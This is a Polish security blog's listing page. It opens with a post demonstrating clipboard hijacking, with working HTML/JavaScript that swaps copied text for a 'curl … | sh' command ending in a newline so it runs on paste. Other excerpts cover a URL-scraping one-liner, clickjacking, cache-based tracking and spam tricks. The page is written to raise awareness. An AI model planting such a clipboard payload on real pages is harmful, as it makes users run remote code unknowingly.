NFsec Logo

Niebezpieczne kopiuj / wklej z Internetu do terminala #2

03/11/2020 (4 tygodnie temu) w Ataki Internetowe Możliwość komentowania Niebezpieczne kopiuj / wklej z Internetu do terminala #2 została wyłączona

K

ilka lat temu dowiedzieliśmy się, że kopiowanie poleceń bezpośrednio do terminala może mieć trochę inne konsekwencję niż byśmy mogli się spodziewać. Dzisiaj nowoczesne API Javascript pozwalają witrynie internetowej w trywialny sposób zastępowanie tego, co umieścisz w schowku, bez potwierdzenia lub zgody użytkownika. Poniżej znajduje się przykład tego, jak łatwo jest wykonać ten atak:

<html>
<head>
<title>Kopiuj wklej demo</title>
</head>
<body>
<p id="skopiujmnie">$ echo "Wklej mnie do terminala!"</p>
<script>
document.getElementById('skopiujmnie').addEventListener('copy', function(e) {
e.clipboardData.setData('text/plain', 'echo "A jednak wykonamy \
[curl https://nfsec.pl | sh]"\n');
e.preventDefault();
});
</script>
</body>
</html>

Powyższy kod możemy zapisać jako plik payload.html, wyświetlić w przeglądarce – zaznaczyć, skopiować wyświetlony tekst i wkleić do terminala. Należy zauważyć, że nie musimy nawet naciskać klawisza ENTER po wklejeniu, ponieważ ładunek kodu zawiera znak nowej linii, która to zrobi za nas.

Więcej informacji: Don’t Copy Paste Into A Shell

Wyciąganie adresów URL z plików JavaScript

26/06/2020 w CmdLineFu Możliwość komentowania Wyciąganie adresów URL z plików JavaScript została wyłączona

for i in `curl -s https://adres.pl | grep -Eo \
"(http|https)://[a-zA-Z0-9./?=_-]*\.js"`;
do curl -s $i &> /dev/stdout | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*"*; done

Hosting statycznych stron i treści w Google Drive

26/12/2013 w Techblog Możliwość komentowania Hosting statycznych stron i treści w Google Drive została wyłączona

G

oogle Drive umożliwia nie tylko przechowywanie zdjęć i innych dokumentów, ale również statycznych stron HTML, plików JavaScript oraz CSS. W tym celu wystarczy:

  • Stworzyć nowy folder i udostępnić go jako publiczny,
  • Wgrać do tego folderu pliki HTML, JS, CSS,
  • Zaznaczyć wybrany plik HTML i wybrać z menu Więcej: Otwórz za pomocą: Przeglądarka Dysku Google
  • W otworzonej zakładce z przeglądarką ponownie kliknąć Pogląd i skopiować URL

Tak otrzymany URL: https://googledrive.com/host/1B4SBiW70ZQreMzZtbktoQ1k0VHM/static.html (gdzie host to nazwa udostępnionego folderu) możemy wkleić w kod innej strony – plik static.html zamienić na np. static.css itd. – wykorzystując infrastrukturę Google do celów hostingowych małych i prostych plików.

Więcej informacji: Host webpages on Google Drive

Ciastka bez ciasta

19/08/2013 w Bezpieczeństwo Możliwość komentowania Ciastka bez ciasta została wyłączona

O

prócz wszystkich znanych metod śledzenia użytkowników w Internecie tj. ciasteczek, javascript, localstorage, sessionstorage, globalstorage, flash, adresu ip, user agentów, czy metody opracowanej przez Panopticlick doszła kolejna – wykorzystująca inną przestrzeń do przechowywania danych, która jest trwała między ponownym uruchomieniem przeglądarki: pamięć cache.
[ czytaj całość… ]

9 mitów bezpieczeństwa stron internetowych dla początkujących

17/03/2011 w Bezpieczeństwo Możliwość komentowania 9 mitów bezpieczeństwa stron internetowych dla początkujących została wyłączona

I

gnorancja to błogosławieństwo – nawet w czasach Web 2.0 – istnieją niezliczone mity krążące wokół użytkowników Internetu, dotyczące bezpieczeństwa aplikacji Webowych. Niektóre z starych, ale jarych (np. użytkownik zawsze będzie wiedział kiedy wirus lub koń trojański zaatakuje jego komputer) tworzą to coraz nowsze mity obracające się wokół wyszukiwarki Google, sieci społecznościowych i przeglądarek internetowych. Przewaga krążących informacji na temat bezpieczeństwa Web 2.0 potrafi trochę namieszać w ogólnym, naszym pojęciu o tej technologii. Oto kilka informacji mających na celu próbę wyprostowania niektórych z największych nieporozumień dotyczących bezpieczeństwa aplikacji Webowych.
[ czytaj całość… ]

Clickjacking – groźny link

25/05/2010 w Magazyny Możliwość komentowania Clickjacking – groźny link została wyłączona

A

rtykuł ten pokaże nową technikę web ataku. Pokazany został sposób, jak prosto można ukraść kliknięcia z witryny. Opis tej techniki pomoże zrozumieć proces sam w sobie oraz zaprezentuje problemy z zabezpieczaniem się przed tego typu atakiem.
[ czytaj całość… ]

Funkcje kodujące adresy e-mail w CMS WordPress

14/11/2009 w Bezpieczeństwo Możliwość komentowania Funkcje kodujące adresy e-mail w CMS WordPress została wyłączona

W

iadomości SPAM swoje główne źródło bazy adresów e-mail znajdują w spambotach. Spamboty są to specjalnie zaprogramowane roboty sieciowe – podobne do tych, które indeksują strony dla wyszukiwarek – tylko z tą różnicą, iż robią to pod kontem wyszukiwania ogólnodostępnych adresów e-mail umieszczanych na stronach WWW. Tak zebrane adresy e-mail lądują w bazach danych spamerów, stają się przedmiotem handlu wśród różnych niechcianych kampanii reklamowych czy innych negatywnych form aktywności sieciowej szkodników pod postacią wirusów czy robaków.
[ czytaj całość… ]

Zmuszenie IE 5,6,7,8 do „standardowego” zachowania

26/10/2009 w Techblog Możliwość komentowania Zmuszenie IE 5,6,7,8 do „standardowego” zachowania została wyłączona

D

ean Edwards opracował bibliotekę w skrypcie Java w celu zmuszenia Internet Explorera do zachowywania się jak przeglądarka w pełni zgodnej ze standardami. Naprawia ona wiele niedociągnięć interpretacji kodu HTML, a także CSS oraz wprowadza poprawną obsługę przezroczystości plików PNG w wersji 5 oraz 6 tej przeglądarki.
[ czytaj całość… ]

Niebezpieczny Firefox

04/10/2009 w Magazyny Możliwość komentowania Niebezpieczny Firefox została wyłączona

P

rzeglądarka Mozilli zyskuje sobie coraz większą popularność. Wielu użytkowników wybrało ją ze względu na bezpieczeństwo, które oferuje, wydajny silnik Gecko czy kilka udoskonaleń, które już na stałe zagościły w przeglądarkach. Czy jednak Firefox jest tak bezpieczny, za jakiego jest uważany?
[ czytaj całość… ]

Spamerskie sztuczki

27/09/2009 w Magazyny Możliwość komentowania Spamerskie sztuczki została wyłączona

S

pamerzy stosują różnego rodzaju sztuczki, których celem jest oszukanie filtrów antyspamowych. Zobaczmy, jak sztuczki te wyglądają w praktyce i jak filtry antyspamowe pokonują spamerów ich własną bronią.
[ czytaj całość… ]